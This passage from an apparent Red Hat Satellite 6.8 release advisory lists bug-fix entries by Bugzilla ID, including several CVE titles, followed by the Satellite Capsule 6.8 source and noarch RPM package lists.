1846593 - Satellite-installer failed with error "Could not find a suitable provider for foreman_smartproxy" while doing upgrade from 6.7 to 6.8
1847019 - Empty applicability for non-modular repos
1847063 - Slow manifest import and/or refresh
1847407 - load_pools macro not in list of macros
1847645 - Allow override of Katello's DISTRIBUTOR_VERSION
1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details.
1847840 - Libvirt note link leads to 404
1847871 - Combined Profile Update: ArgumentError: invalid argument: nil.
1848291 - Download kernel/initram for kexec asynchronously
1848535 - Unable to create a pure IPv6 host
1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)
1848902 - ERF42-0258 [Foreman::Exception]: is not valid, enter id or name
1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms
1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule
1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names
1849656 - ERROR! You cannot use loops on 'import_tasks' statements. You should use 'include_tasks' instead.
1849680 - Task progress decimal precision discrepancy between UI, CLI, and API
1849869 - Unable to recycle the dynflow executor
1850355 - Auth Source Role Filters are not working in Satellite 6.8
1850536 - Can't add RHEV with APIv3 through Hammer
1850914 - Checksum type "sha256" is not available for all units in the repository. Make sure those units have been downloaded
1850934 - Satellite-installer failed with error "Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)"
1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates
1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9
1851167 - Autoattach -> "undefined" subscription added
1851176 - Subscriptions do not provide any repository sets
1851952 - "candlepin_events FAIL Not running" and wont restart
1852371 - Allow http proxy ports by default
1852723 - Broken link for documentation on installation media page
1852733 - Inventory upload documentation redirects to default location
1852735 - New version of the plugin is available: 2.0.8
1853076 - large capsule syncs cause slow processing of dynflow tasks/steps
1853200 - foreman-rake-db:migrate Fails on "No indexes found on foreman_tasks_locks with the options provided"
1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7
1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh
1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views
1853572 - Broken documentation link for 'RHV' in Compute Resource
1854138 - System purpose status should show as 'disabled' when Satellite is in Simple Content Access mode.
1854397 - Compliance reports are not being uploaded to satellite.
1854530 - PG::NotNullViolation when syncing hosts from cloud
1855008 - Host parameters are set after the host is created.
1855254 - Links to documentation broken in HTTP Proxies setup
1855348 - katello_applicability accidentally set to true at install
1855710 - 'Ensure RPM repository is configured and enabled' task says 'FIXME'
1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page.
1856379 - Add missing VM creation tests
1856401 - [RFE] Add module to create HTTP Proxy
1856831 - New version of the plugin is available: 2.0.9
1856837 - undefined method '#httpboot' for NilClass::Jail (NilClass) when creating an IPv6 only host
1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500
1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos
1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos
1857377 - Capsule Upgrade Playbook fails with "Failed to initialize: NoMethodError - undefined method default_capsule' for Katello:Module"
1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError
1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename.
1857726 - Warnings are shown during the satellite package installation on RHEL 7.9
1858237 - Upgraded Satellite has duplicated katello_pools indexes
1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user
1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite
1858855 - Creating compute resources on IPV6 network does not fail gracefully
1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf
1859194 - load_hosts macro duplicated in a list of macros
1859276 - Need to update the deprecation warning message on Statistics and Trends page.
1859705 - Tomcat is not running on fresh Capsule installation
1859929 - User can perform other manifest actions while the first one starts
1860351 - 'Host - compare content hosts packages' report fails with error 'undefined method '#first' for NilClass'
1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed
1860422 - Host with remediations can't be removed
1860430 - 'Host - compare content hosts packages' report: Safemode doesn't allow to access 'version'...
1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service
1860519 - Browsing capsule /pub directory with https fails with forbidden don't have permission to access /pub/ error.
1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8
1860587 - Documentation link in Administer -> About pointing to 6.6 document.
1860835 - Installed Packages not displayed on About page
1860957 - Unable to select an organization for sync management
1861367 - Import Template sync never completes
1861397 - UI dialog for Capsule Upgrade Playbook job doesn't state whitelist_options is required
1861422 - Error encountered while handling the response, replying with an error message ('plugin_config')
1861656 - smart-proxy-openscap-send command fails to upload reports to satellite.
1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request
1861766 - Add ability to list traces by host with hammer
1861807 - Cancel/Abort button should be disabled once REX job is finish
1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer
1861831 - satellite-change-hostname cannot change the satellite hostname after failing.
1861890 - Recommended repos do not match Satellite version
1861970 - Content -> Product doesn't work when no organization is selected
1862135 - updating hosts policy using bulk action fails with sql error
1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite.
1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6
1865871 - Obfuscated hosts do not have domain reported
1865872 - Templates doc - examples on onepage.html are not processed
1865874 - Add inventory status to host
1865876 - Make recommendations count in hosts index a link
1865879 - Add automatic scheduler for insights sync
1865880 - Add an explanation how to enable insights sync
1865928 - Templates documentation help page has hard-coded Satellite setting value
1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently
1866029 - Templates DSL documentation: Parts of description are put in <pre> tag
1866436 - host search filter does not work in job invocation page
1866461 - Run action is missing in job templates page
1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page
1866700 - Hammer CLI is missing "resolve" (traces) option for katello-tracer
1866710 - Wrong API endpoint path referenced for resolving host traces
1867239 - hammer content-view version incremental-update fails with ISE
1867287 - Error Row was updated or deleted by another transaction when deleting docker repository
1867311 - Upgrade fails when checkpoint_segments postgres parameter configured
1867399 - Receptor-satellite isn't able to deal with jobs where all the hosts are unknown to satellite
1867895 - API Create vmware ComputeResource fails with "Datacenter can't be blank"
1868183 - Unable to change virt-who hypervisor location.
1868971 - Receptor installation job doesn't properly escape data it puts into receptor.conf
1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)' messages come in upgrade and installation.
1869812 - Tasks fail to complete under load
1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow
1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)
1871434 - theme css ".container" class rule is too generic
1871729 - ansible-runner implementation depends on third party repository for ansible-runner package.
1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout
1871978 - Bug in provisioning_template Module
1872014 - Enable web console on host error in "Oops, we're sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console"
1872041 - Host search returns incorrect result
1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result
1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover
1874143 - Red Hat Inventory Uploads does not use proxy
1874160 - Changing Content View of a Content Host needs to better inform the user around client needs
1874168 - Sync Plan fails with 'uninitialized constant Actions::Foreman::Exception'
1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file
1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)
1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow
1874176 - Unable to search by value of certain Hostgroup parameter
1874422 - Hits Sync uses only old proxy setting
1874619 - Hostgroup tag is never reported in slice
1875357 - After upgrade server response check failed for candlepin.
1875426 - Azure VM provision fails with errorrequests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`
1875660 - Reporting Template macros host_cores is not working as expected
1875667 - Audit page list incorrect search filter
1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only
1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding
1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries
1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-.csv
1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-.csv
1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-.csv
1878194 - In Capsule upgrade, "yum update" dump some error messages.
1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled
1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections
1878850 - creating host from hg doesn't resolves the user-data template
1879151 - Remote execution status not updating with large number of hosts
1879448 - Add hits details to host details page
1879451 - Stop uploading if Satellite's setting is disconnected
1879453 - Add plugin version to report metadata
1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP
1880637 - [6.8] satellite-installer always runs upgrade steps
1881066 - Safemode doesn't allow to access 'host_cores' on #
1881078 - Use Passenger instead of Puma as the Foreman application server
1881988 - [RFE] IPv6 support for Satellite 6.8
1882276 - Satellite installation fails at execution of '/usr/sbin/foreman-rake -- config -k 'remote_execution_cockpit_url' -v '/webcon/=%{host}''
1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results
1883093 - installer-upgrade failed with error "Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)"
1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error "HTTP error (500 - Internal Server Error): Unable to register system, not all services available"
1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals
1887489 - Insights rules can't be loaded on freshly installed Satellite system
1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO
- Package List:
Red Hat Satellite Capsule 6.8:
Source: ansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm ansible-runner-1.4.6-1.el7ar.src.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm ansiblerole-insights-client-1.7.1-1.el7sat.src.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm createrepo_c-0.7.4-1.el7sat.src.rpm foreman-2.1.2.19-1.el7sat.src.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm foreman-discovery-image-3.6.7-1.el7sat.src.rpm foreman-discovery-image-service-1.0.0-3.el7sat.src.rpm foreman-installer-2.1.2.8-1.el7sat.src.rpm foreman-proxy-2.1.2-2.el7sat.src.rpm future-0.16.0-11.el7sat.src.rpm gofer-2.12.5-7.el7sat.src.rpm hfsplus-tools-332.14-12.el7.src.rpm katello-3.16.0-1.el7sat.src.rpm katello-certs-tools-2.7.1-1.el7sat.src.rpm katello-client-bootstrap-1.7.5-1.el7sat.src.rpm katello-selinux-3.4.0-1.el7sat.src.rpm kobo-0.5.1-1.el7sat.src.rpm libmodulemd-1.7.0-1.pulp.el7sat.src.rpm libsolv-0.7.4-4.pulp.el7sat.src.rpm libwebsockets-2.4.2-2.el7.src.rpm livecd-tools-20.4-1.6.el7sat.src.rpm mod_xsendfile-0.12-11.el7sat.src.rpm ostree-2017.1-2.atomic.el7.src.rpm pulp-2.21.3-1.el7sat.src.rpm pulp-docker-3.2.7-1.el7sat.src.rpm pulp-katello-1.0.3-1.el7sat.src.rpm pulp-ostree-1.3.1-2.el7sat.src.rpm pulp-puppet-2.21.3-2.el7sat.src.rpm pulp-rpm-2.21.3-2.el7sat.src.rpm puppet-agent-6.14.0-2.el7sat.src.rpm puppet-agent-oauth-0.5.1-3.el7sat.src.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm puppetlabs-stdlib-4.25.1-2.el7sat.src.rpm puppetserver-6.13.0-1.el7sat.src.rpm pycairo-1.16.3-9.el7sat.src.rpm pygobject3-3.28.3-2.el7sat.src.rpm python-amqp-2.2.2-5.el7sat.src.rpm python-anyjson-0.3.3-11.el7sat.src.rpm python-apypie-0.2.2-1.el7sat.src.rpm python-billiard-3.5.0.3-3.el7sat.src.rpm python-blinker-1.3-2.el7sat.src.rpm python-celery-4.0.2-9.el7sat.src.rpm python-click-6.7-9.el7sat.src.rpm python-crane-3.3.1-9.el7sat.src.rpm python-daemon-2.1.2-7.el7at.src.rpm python-django-1.11.29-1.el7sat.src.rpm python-flask-0.12.2-4.el7sat.src.rpm python-gnupg-0.3.7-1.el7ui.src.rpm python-isodate-0.5.4-12.el7sat.src.rpm python-itsdangerous-0.24-15.el7sat.src.rpm python-jinja2-2.10-10.el7sat.src.rpm python-jmespath-0.9.0-6.el7_7.src.rpm python-kid-0.9.6-11.el7sat.src.rpm python-kombu-4.0.2-13.el7sat.src.rpm python-lockfile-0.11.0-10.el7ar.src.rpm python-markupsafe-0.23-21.el7sat.src.rpm python-mongoengine-0.10.5-2.el7sat.src.rpm python-nectar-1.6.2-1.el7sat.src.rpm python-oauth2-1.5.211-8.el7sat.src.rpm python-okaara-1.0.37-2.el7sat.src.rpm python-pexpect-4.6-1.el7at.src.rpm python-psutil-5.0.1-3.el7sat.src.rpm python-ptyprocess-0.5.2-3.el7at.src.rpm python-pycurl-7.43.0.2-4.el7sat.src.rpm python-pymongo-3.2-2.el7sat.src.rpm python-qpid-1.35.0-5.el7.src.rpm python-semantic_version-2.2.0-6.el7sat.src.rpm python-simplejson-3.2.0-1.el7sat.src.rpm python-twisted-16.4.1-12.el7sat.src.rpm python-vine-1.1.3-6.el7sat.src.rpm python-werkzeug-0.12.2-5.el7sat.src.rpm python-zope-interface-4.0.5-4.el7.src.rpm qpid-cpp-1.36.0-28.el7amq.src.rpm qpid-dispatch-1.5.0-4.el7.src.rpm qpid-proton-0.28.0-3.el7.src.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm repoview-0.6.6-11.el7sat.src.rpm rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm rubygem-highline-1.7.8-3.el7sat.src.rpm rubygem-newt-0.9.6-3.el7sat.src.rpm rubygem-oauth-0.5.4-2.el7sat.src.rpm saslwrapper-0.22-5.el7sat.src.rpm satellite-6.8.0-1.el7sat.src.rpm satellite-installer-6.8.0.11-1.el7sat.src.rpm tfm-6.1-1.el7sat.src.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm tfm-rubygem-highline-1.7.8-4.el7sat.src.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm tfm-rubygem-logging-2.2.2-6.el7sat.src.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm tfm-rubygem-rack-2.2.3-1.el7sat.src.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm tfm-rubygem-unf-0.1.3-7.el7sat.src.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm
noarch: ansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm ansible-runner-1.4.6-1.el7ar.noarch.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm ansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm crane-selinux-3.4.0-1.el7sat.noarch.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm foreman-debug-2.1.2.19-1.el7sat.noarch.rpm foreman-discovery-image-3.6.7-1.el7sat.noarch.rpm foreman-installer-2.1.2.8-1.el7sat.noarch.rpm foreman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm foreman-proxy-2.1.2-2.el7sat.noarch.rpm foreman-proxy-content-3.16.0-1.el7sat.noarch.rpm foreman-proxy-journald-2.1.2-2.el7sat.noarch.rpm katello-certs-tools-2.7.1-1.el7sat.noarch.rpm katello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm katello-common-3.16.0-1.el7sat.noarch.rpm katello-debug-3.16.0-1.el7sat.noarch.rpm kobo-0.5.1-1.el7sat.noarch.rpm pulp-admin-client-2.21.3-1.el7sat.noarch.rpm pulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm pulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm pulp-katello-1.0.3-1.el7sat.noarch.rpm pulp-maintenance-2.21.3-1.el7sat.noarch.rpm pulp-nodes-child-2.21.3-1.el7sat.noarch.rpm pulp-nodes-common-2.21.3-1.el7sat.noarch.rpm pulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm pulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm pulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm pulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm pulp-selinux-2.21.3-1.el7sat.noarch.rpm pulp-server-2.21.3-1.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm puppetserver-6.13.0-1.el7sat.noarch.rpm python-blinker-1.3-2.el7sat.noarch.rpm python-gnupg-0.3.7-1.el7ui.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-kid-0.9.6-11.el7sat.noarch.rpm python-mongoengine-0.10.5-2.el7sat.noarch.rpm python-nectar-1.6.2-1.el7sat.noarch.rpm python-oauth2-1.5.211-8.el7sat.noarch.rpm python-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-common-2.21.3-1.el7sat.noarch.rpm python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python-semantic_version-2.2.0-6.el7sat.noarch.rpm python2-amqp-2.2.2-5.el7sat.noarch.rpm python2-ansible-runner-1.4.6-1.el7ar.noarch.rpm python2-anyjson-0.3.3-11.el7sat.noarch.rpm python2-apypie-0.2.2-1.el7sat.noarch.rpm python2-celery-4.0.2-9.el7sat.noarch.rpm python2-click-6.7-9.el7sat.noarch.rpm python2-crane-3.3.1-9.el7sat.noarch.rpm python2-daemon-2.1.2-7.el7at.noarch.rpm python2-django-1.11.29-1.el7sat.noarch.rpm python2-flask-0.12.2-4.el7sat.noarch.rpm python2-future-0.16.0-11.el7sat.noarch.rpm python2-isodate-0.5.4-12.el7sat.noarch.rpm python2-itsdangerous-0.24-15.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-jmespath-0.9.0-6.el7_7.noarch.rpm python2-kombu-4.0.2-13.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-okaara-1.0.37-2.el7sat.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm python2-vine-1.1.3-6.el7sat.noarch.rpm python2-werkzeug-0.12.2-5.el7sat.noarch.rpm qpid-dispatch-tools-1.5.0-4.el7.noarch.rpm qpid-tools-1.36.0-28.el7amq.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm repoview-0.6.6-11.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-highline-1.7.8-3.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm satellite-capsule-6.8.0-1.el7sat.noarch.rpm satellite-common-6.8.0-1.el7sat.noarch.rpm satellite-debug-tools-6.8.0-1.el7sat.noarch.rpm satellite-installer-6.8.0.11-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm tfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm tfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm
